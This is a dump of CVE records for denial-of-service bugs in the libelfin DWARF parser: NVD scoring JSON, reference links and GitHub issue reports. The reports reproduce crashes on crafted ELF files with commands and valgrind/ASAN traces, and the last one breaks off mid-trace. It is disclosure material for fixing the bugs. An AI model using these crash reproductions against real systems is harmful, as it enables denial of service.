{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/50" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaoxiongwang/function_bugs/tree/master/libelfin#segv-in-function-dwarfcursoruleb128-at-dwarfinternalhh154" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaoxiongwang/function_bugs/tree/master/libelfin#segv-in-function-dwarfcursoruleb128-at-dwarfinternalhh154" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libelfin_project:libelfin:0.3:*:*:*:*:*:*:*", "matchCriteriaId": "B18704CF-84AF-4699-BA52-8974DFE68BC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/aclements/libelfin/issues/50
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aclements", "libelfin" ]
Tested in Ubuntu 16.04, 64bit. The tested program is the example program dump-tree. The testcase is [dump_tree_segv](https://github.com/xiaoxiongwang/function_bugs/blob/master/libelfin/dump_tree_segv). I use the following command: ``` /path-to-libelfin/examples/dump-tree dump_tree_segv ``` and get: ``` Segmentation fault (core dumped) ``` I use **valgrind** to analysis the bug and get the below information (absolute path information omitted): ``` valgrind /path-to-libelfin/examples/dump-tree dump_tree_segv ==21176== Memcheck, a memory error detector ==21176== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==21176== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==21176== Command: /path-to-libelfin/examples/dump-tree dump_tree_segv ==21176== ==21176== Invalid read of size 1 ==21176== at 0x431161: uleb128 (internal.hh:154) ==21176== by 0x431161: dwarf::die::read(unsigned long) (die.cc:35) ==21176== by 0x44869E: dwarf::value::as_reference() const (value.cc:215) ==21176== by 0x44C482: dwarf::to_string[abi:cxx11](dwarf::value const&) (value.cc:324) ==21176== by 0x404A3B: dump_tree(dwarf::die const&, int) (dump-tree.cc:19) ==21176== by 0x4035C1: dump_tree (dump-tree.cc:21) ==21176== by 0x4035C1: main (dump-tree.cc:43) ==21176== Address 0x5b02809b is not stack'd, malloc'd or (recently) free'd ==21176== ==21176== ==21176== Process terminating with default action of signal 11 (SIGSEGV) ==21176== Access not within mapped region at address 0x5B02809B ==21176== at 0x431161: uleb128 (internal.hh:154) ==21176== by 0x431161: dwarf::die::read(unsigned long) (die.cc:35) ==21176== by 0x44869E: dwarf::value::as_reference() const (value.cc:215) ==21176== by 0x44C482: dwarf::to_string[abi:cxx11](dwarf::value const&) (value.cc:324) ==21176== by 0x404A3B: dump_tree(dwarf::die const&, int) (dump-tree.cc:19) ==21176== by 0x4035C1: dump_tree (dump-tree.cc:21) ==21176== by 0x4035C1: main (dump-tree.cc:43) ==21176== If you believe this happened as a result of a stack ==21176== overflow in your program's main thread (unlikely but ==21176== possible), you can try to increase the size of the ==21176== main thread stack using the --main-stacksize= flag. ==21176== The main thread stack size used in this run was 8388608. --- <0> <b> DW_TAG_compile_unit DW_AT_producer DW_AT_language 4 byte block: cb 0 0 0 DW_AT_name DW_AT_comp_dir DW_AT_low_pc 0x0 DW_AT_high_pc 0x1500000000000000 DW_AT_stmt_list <line 0x0> <2d> DW_TAG_base_type DW_AT_byte_size 0x8 DW_AT_encoding 0x7 DW_AT_name long unsigned int <34> DW_TAG_base_type DW_AT_byte_size 0x1 DW_AT_encoding 0x8 DW_AT_name <3b> DW_TAG_base_type DW_AT_byte_size 0x2 DW_AT_encoding 0x7 DW_AT_name <42> DW_TAG_base_type DW_AT_byte_size 0x4 DW_AT_encoding 0x7 DW_AT_name <49> DW_TAG_base_type DW_AT_byte_size 0x1 DW_AT_encoding 0x6 DW_AT_name <50> DW_TAG_base_type DW_AT_byte_size 0x2 DW_AT_encoding 0x5 DW_AT_name <57> DW_TAG_base_type DW_AT_byte_size 0x4 DW_AT_encoding 0x5 DW_AT_name int <5e> DW_TAG_base_type DW_AT_byte_size 0x8 DW_AT_encoding 0x5 DW_AT_name <65> DW_TAG_base_type DW_AT_byte_size 0x8 DW_AT_encoding 0x7 DW_AT_name <6c> DW_TAG_base_type DW_AT_byte_size 0x1 DW_AT_encoding 0x6 DW_AT_name <73> DW_TAG_subprogram DW_AT_external true DW_AT_name DW_AT_decl_file 0x1 DW_AT_decl_line 0x3 ==21176== ==21176== HEAP SUMMARY: ==21176== in use at exit: 81,552 bytes in 68 blocks ==21176== total heap usage: 182 allocs, 114 frees, 92,963 bytes allocated ==21176== ==21176== LEAK SUMMARY: ==21176== definitely lost: 0 bytes in 0 blocks ==21176== indirectly lost: 0 bytes in 0 blocks ==21176== possibly lost: 0 bytes in 0 blocks ==21176== still reachable: 81,552 bytes in 68 blocks ==21176== suppressed: 0 bytes in 0 blocks ==21176== Rerun with --leak-check=full to see details of leaked memory ==21176== ==21176== For counts of detected and suppressed errors, rerun with: -v ==21176== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) Segmentation fault (core dumped) ``` I use **AddressSanitizer** to build ffjpeg and running it with the following command: ``` /path-to-libelfin/examples/dump-tree dump_tree_segv ``` This is the ASAN information (absolute path information omitted): ``` /path-to-libelfin-address/examples/dump-tree dump_tree_segv ASAN:SIGSEGV ================================================================= ==21215==ERROR: AddressSanitizer: SEGV on unknown address 0x7f519be3409b (pc 0x000000417cb5 bp 0x7ffddf8f6830 sp 0x7ffddf8f6730 T0) #0 0x417cb4 in dwarf::cursor::uleb128() /path-to-libelfin-address/dwarf/internal.hh:154 #1 0x417cb4 in dwarf::die::read(unsigned long) /path-to-libelfin-address/dwarf/die.cc:35 #2 0x422a25 in dwarf::value::as_reference() const /path-to-libelfin-address/dwarf/value.cc:215 #3 0x425711 in dwarf::to_string[abi:cxx11](dwarf::value const&) /path-to-libelfin-address/dwarf/value.cc:324 #4 0x403aec in dump_tree(dwarf::die const&, int) /path-to-libelfin-address/examples/dump-tree.cc:19 #5 0x403bea in dump_tree(dwarf::die const&, int) /path-to-libelfin-address/examples/dump-tree.cc:21 #6 0x403361 in main /path-to-libelfin-address/examples/dump-tree.cc:43 #7 0x7f514331582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #8 0x403878 in _start (/path-to-libelfin-address/examples/dump-tree+0x403878) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /path-to-libelfin-address/dwarf/internal.hh:154 dwarf::cursor::uleb128() ==21215==ABORTING ``` An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service (DoS).
SEGV in function dwarf::cursor::uleb128 at dwarf/internal.hh:154
https://api.github.com/repos/aclements/libelfin/issues/50/comments
1
2020-08-15T13:16:38Z
2021-08-06T06:50:07Z
https://github.com/aclements/libelfin/issues/50
679,573,769
50
2,267
CVE-2020-24823
2021-08-04T15:15:08.633
A vulnerability in the dwarf::to_string function of Libelfin v0.3 allows attackers to cause a denial of service (DOS) through a segmentation fault via a crafted ELF file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/51" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaoxiongwang/function_bugs/tree/master/libelfin#segv-in-function-dwarfto_string-at-dwarfvaluecc300" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaoxiongwang/function_bugs/tree/master/libelfin#segv-in-function-dwarfto_string-at-dwarfvaluecc300" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libelfin_project:libelfin:0.3:*:*:*:*:*:*:*", "matchCriteriaId": "B18704CF-84AF-4699-BA52-8974DFE68BC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/aclements/libelfin/issues/51
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aclements", "libelfin" ]
Tested in Ubuntu 16.04, 64bit. The tested program is the example program dump-tree. The testcase is [dump_tree_segv2](https://github.com/xiaoxiongwang/function_bugs/blob/master/libelfin/dump_tree_segv2). I use the following command: ``` /path-to-libelfin/examples/dump-tree dump_tree_segv2 ``` and get: ``` Segmentation fault (core dumped) ``` I use **valgrind** to analysis the bug and get the below information (absolute path information omitted): ``` valgrind /path-to-libelfin/examples/dump-tree dump_tree_segv2 ==22094== Memcheck, a memory error detector ==22094== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==22094== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==22094== Command: /path-to-libelfin/examples/dump-tree dump_tree_segv2 ==22094== ==22094== Invalid read of size 1 ==22094== at 0x44CE58: dwarf::to_string[abi:cxx11](dwarf::value const&) (value.cc:300) ==22094== by 0x4031B0: dump_tree (dump-tree.cc:19) ==22094== by 0x4031B0: main (dump-tree.cc:43) ==22094== Address 0x402a000 is not stack'd, malloc'd or (recently) free'd ==22094== ==22094== ==22094== Process terminating with default action of signal 11 (SIGSEGV) ==22094== Access not within mapped region at address 0x402A000 ==22094== at 0x44CE58: dwarf::to_string[abi:cxx11](dwarf::value const&) (value.cc:300) ==22094== by 0x4031B0: dump_tree (dump-tree.cc:19) ==22094== by 0x4031B0: main (dump-tree.cc:43) ==22094== If you believe this happened as a result of a stack ==22094== overflow in your program's main thread (unlikely but ==22094== possible), you can try to increase the size of the ==22094== main thread stack using the --main-stacksize= flag. ==22094== The main thread stack size used in this run was 8388608. --- <0> <b> DW_TAG_compile_unit DW_AT_producer DW_AT_language 12 byte block: cb 0 0 0 12 0 0 0 26 5 40 0 DW_AT_name long unsigned int ==22094== ==22094== HEAP SUMMARY: ==22094== in use at exit: 111,921 bytes in 68 blocks ==22094== total heap usage: 145 allocs, 77 frees, 150,879 bytes allocated ==22094== ==22094== LEAK SUMMARY: ==22094== definitely lost: 0 bytes in 0 blocks ==22094== indirectly lost: 0 bytes in 0 blocks ==22094== possibly lost: 0 bytes in 0 blocks ==22094== still reachable: 111,921 bytes in 68 blocks ==22094== suppressed: 0 bytes in 0 blocks ==22094== Rerun with --leak-check=full to see details of leaked memory ==22094== ==22094== For counts of detected and suppressed errors, rerun with: -v ==22094== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) Segmentation fault (core dumped) ``` I use **AddressSanitizer** to build ffjpeg and running it with the following command: ``` /path-to-libelfin/examples/dump-tree dump_tree_segv2 Segmentation fault (core dumped) ``` This is the ASAN information (absolute path information omitted): ``` /path-to-libelfin-address/examples/dump-tree dump_tree_segv2 ================================================================= ==22134==ERROR: AddressSanitizer: unknown-crash on address 0x7f6f8b233000 at pc 0x000000428213 bp 0x7ffd7ae677d0 sp 0x7ffd7ae677c0 READ of size 1 at 0x7f6f8b233000 thread T0 #0 0x428212 in dwarf::to_string[abi:cxx11](dwarf::value const&) /path-to-libelfin-address/dwarf/value.cc:300 #1 0x403aec in dump_tree(dwarf::die const&, int) /path-to-libelfin-address/examples/dump-tree.cc:19 #2 0x403361 in main /path-to-libelfin-address/examples/dump-tree.cc:43 #3 0x7f6f8971282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #4 0x403878 in _start (/path-to-libelfin-address/examples/dump-tree+0x403878) AddressSanitizer can not describe address in more detail (wild memory access suspected). SUMMARY: AddressSanitizer: unknown-crash /path-to-libelfin-address/dwarf/value.cc:300 dwarf::to_string[abi:cxx11](dwarf::value const&) Shadow bytes around the buggy address: 0x0fee7163e5b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fee7163e5c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fee7163e5d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fee7163e5e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fee7163e5f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fee7163e600:[fe]fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe 0x0fee7163e610: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe 0x0fee7163e620: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe 0x0fee7163e630: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe 0x0fee7163e640: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe 0x0fee7163e650: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==22134==ABORTING ``` An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service (DoS).
SEGV in function dwarf::to_string at dwarf/value.cc:300
https://api.github.com/repos/aclements/libelfin/issues/51/comments
1
2020-08-15T13:17:23Z
2021-08-06T06:49:39Z
https://github.com/aclements/libelfin/issues/51
679,573,875
51
2,268
CVE-2020-24824
2021-08-04T15:15:08.673
A global buffer overflow issue in the dwarf::line_table::line_table function of Libelfin v0.3 allows attackers to cause a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/48" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaoxiongwang/function_bugs/tree/master/libelfin#global-buffer-overflow-in-function-dwarfline_tableline_table-at-dwarflinecc107" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/48" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaoxiongwang/function_bugs/tree/master/libelfin#global-buffer-overflow-in-function-dwarfline_tableline_table-at-dwarflinecc107" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libelfin_project:libelfin:0.3:*:*:*:*:*:*:*", "matchCriteriaId": "B18704CF-84AF-4699-BA52-8974DFE68BC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/aclements/libelfin/issues/48
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aclements", "libelfin" ]
Tested in Ubuntu 16.04, 64bit. The tested program is the example program dump_line. The testcase is [dump_line_global_buffer_overflow](https://github.com/xiaoxiongwang/function_bugs/blob/master/libelfin/dump_line_global_buffer_overflow). I use the following command: ``` /path-to-libelfin/examples/dump-lines dump_line_global_buffer_overflow ``` and get: ``` terminate called after throwing an instance of 'dwarf::format_error' what(): expected 858944595 arguments for line number opcode 16, got 2 --- <0> Aborted (core dumped) ``` I use **valgrind** to analysis the bug and get the below information (absolute path information omitted): ``` valgrind /path-to-libelfin/examples/dump-lines dump_line_global_buffer_overflow ==9235== Memcheck, a memory error detector ==9235== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==9235== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==9235== Command: /path-to-libelfin/examples/dump-lines dump_line_global_buffer_overflow ==9235== terminate called after throwing an instance of 'dwarf::format_error' what(): expected 858944595 arguments for line number opcode 16, got 2 --- <0> ==9235== ==9235== Process terminating with default action of signal 6 (SIGABRT) ==9235== at 0x546A428: raise (raise.c:54) ==9235== by 0x546C029: abort (abort.c:89) ==9235== by 0x4ED3DDD: ??? (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.28) ==9235== by 0x4EDF895: ??? (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.28) ==9235== by 0x4EDF900: std::terminate() (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.28) ==9235== by 0x4EDFB54: __cxa_throw (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.28) ==9235== by 0x48226F: dwarf::line_table::line_table(std::shared_ptr<dwarf::section> const&, unsigned long, unsigned int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (line.cc:116) ==9235== by 0x413558: dwarf::compilation_unit::get_line_table() const (dwarf.cc:304) ==9235== by 0x402CB7: main (dump-lines.cc:41) ==9235== ==9235== HEAP SUMMARY: ==9235== in use at exit: 81,960 bytes in 75 blocks ==9235== total heap usage: 139 allocs, 64 frees, 90,129 bytes allocated ==9235== ==9235== LEAK SUMMARY: ==9235== definitely lost: 0 bytes in 0 blocks ==9235== indirectly lost: 0 bytes in 0 blocks ==9235== possibly lost: 144 bytes in 1 blocks ==9235== still reachable: 81,816 bytes in 74 blocks ==9235== of which reachable via heuristic: ==9235== stdstring : 86 bytes in 1 blocks ==9235== suppressed: 0 bytes in 0 blocks ==9235== Rerun with --leak-check=full to see details of leaked memory ==9235== ==9235== For counts of detected and suppressed errors, rerun with: -v ==9235== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0) Aborted (core dumped) ``` I use **AddressSanitizer** to build ffjpeg and running it with the following command: ``` /path-to-libelfin/examples/dump-lines dump_line_global_buffer_overflow ``` This is the ASAN information (absolute path information omitted): ``` /path-to-libelfin-address/examples/dump-lines dump_line_global_buffer_overflow ================================================================= ==9296==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000045f374 at pc 0x00000043db90 bp 0x7fff57889ea0 sp 0x7fff57889e90 READ of size 4 at 0x00000045f374 thread T0 #0 0x43db8f in dwarf::line_table::line_table(std::shared_ptr<dwarf::section> const&, unsigned long, unsigned int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /path-to-libelfin-address/dwarf/line.cc:107 #1 0x40f67b in dwarf::compilation_unit::get_line_table() const /path-to-libelfin-address/dwarf/dwarf.cc:304 #2 0x403356 in main /path-to-libelfin-address/examples/dump-lines.cc:41 #3 0x7f0bb309682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #4 0x403888 in _start (/path-to-libelfin-address/examples/dump-lines+0x403888) 0x00000045f374 is located 0 bytes to the right of global variable 'opcode_lengths' defined in 'line.cc:15:18' (0x45f340) of size 52 SUMMARY: AddressSanitizer: global-buffer-overflow /path-to-libelfin-address/dwarf/line.cc:107 dwarf::line_table::line_table(std::shared_ptr<dwarf::section> const&, unsigned long, unsigned int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) Shadow bytes around the buggy address: 0x000080083e10: f9 f9 f9 f9 00 00 00 00 03 f9 f9 f9 f9 f9 f9 f9 0x000080083e20: 00 00 00 00 00 00 00 00 04 f9 f9 f9 f9 f9 f9 f9 0x000080083e30: 00 00 00 00 00 04 f9 f9 f9 f9 f9 f9 00 02 f9 f9 0x000080083e40: f9 f9 f9 f9 00 00 00 00 03 f9 f9 f9 f9 f9 f9 f9 0x000080083e50: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 =>0x000080083e60: 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00[04]f9 0x000080083e70: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x000080083e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080083e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080083ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080083eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==9296==ABORTING ``` An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service (DoS) even buffer overflow.
Global-Buffer-Overflow in function dwarf::line_table::line_table at dwarf/line.cc:107
https://api.github.com/repos/aclements/libelfin/issues/48/comments
1
2020-08-15T13:10:45Z
2021-08-06T06:49:08Z
https://github.com/aclements/libelfin/issues/48
679,569,727
48
2,269
CVE-2020-24825
2021-08-04T15:15:08.713
A vulnerability in the line_table::line_table function of Libelfin v0.3 allows attackers to cause a denial of service (DOS) through a segmentation fault via a crafted ELF file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/46" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaoxiongwang/function_bugs/tree/master/libelfin#segv-in-function-line_tableline_table-at-dwarflinecc104" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/46" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaoxiongwang/function_bugs/tree/master/libelfin#segv-in-function-line_tableline_table-at-dwarflinecc104" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libelfin_project:libelfin:0.3:*:*:*:*:*:*:*", "matchCriteriaId": "B18704CF-84AF-4699-BA52-8974DFE68BC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/aclements/libelfin/issues/46
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aclements", "libelfin" ]
Tested in Ubuntu 16.04, 64bit. The tested program is the example program dump-lines. The testcase is [dump_line_segv](https://github.com/xiaoxiongwang/function_bugs/blob/master/libelfin/dump_line_segv). I use the following command: ``` /path-to-libelfin/examples/dump-lines dump_line_segv ``` and got: ``` Segmentation fault (core dumped) ``` I use **valgrind** to analysis the bug and get the below information (absolute path information omitted): ``` valgrind /path-to-libelfin/examples/dump-lines dump_line_segv ==4796== Memcheck, a memory error detector ==4796== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==4796== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==4796== Command: /path-to-libelfin/examples/dump-lines dump_line_segv ==4796== ==4796== Invalid write of size 1 ==4796== at 0x47DA88: dwarf::line_table::line_table(std::shared_ptr<dwarf::section> const&, unsigned long, unsigned int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (line.cc:104) ==4796== by 0x413558: dwarf::compilation_unit::get_line_table() const (dwarf.cc:304) ==4796== by 0x402CB7: main (dump-lines.cc:41) ==4796== Address 0x0 is not stack'd, malloc'd or (recently) free'd ==4796== ==4796== ==4796== Process terminating with default action of signal 11 (SIGSEGV) ==4796== Access not within mapped region at address 0x0 ==4796== at 0x47DA88: dwarf::line_table::line_table(std::shared_ptr<dwarf::section> const&, unsigned long, unsigned int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (line.cc:104) ==4796== by 0x413558: dwarf::compilation_unit::get_line_table() const (dwarf.cc:304) ==4796== by 0x402CB7: main (dump-lines.cc:41) ==4796== If you believe this happened as a result of a stack ==4796== overflow in your program's main thread (unlikely but ==4796== possible), you can try to increase the size of the ==4796== main thread stack using the --main-stacksize= flag. ==4796== The main thread stack size used in this run was 8388608. --- <0> ==4796== ==4796== HEAP SUMMARY: ==4796== in use at exit: 81,475 bytes in 72 blocks ==4796== 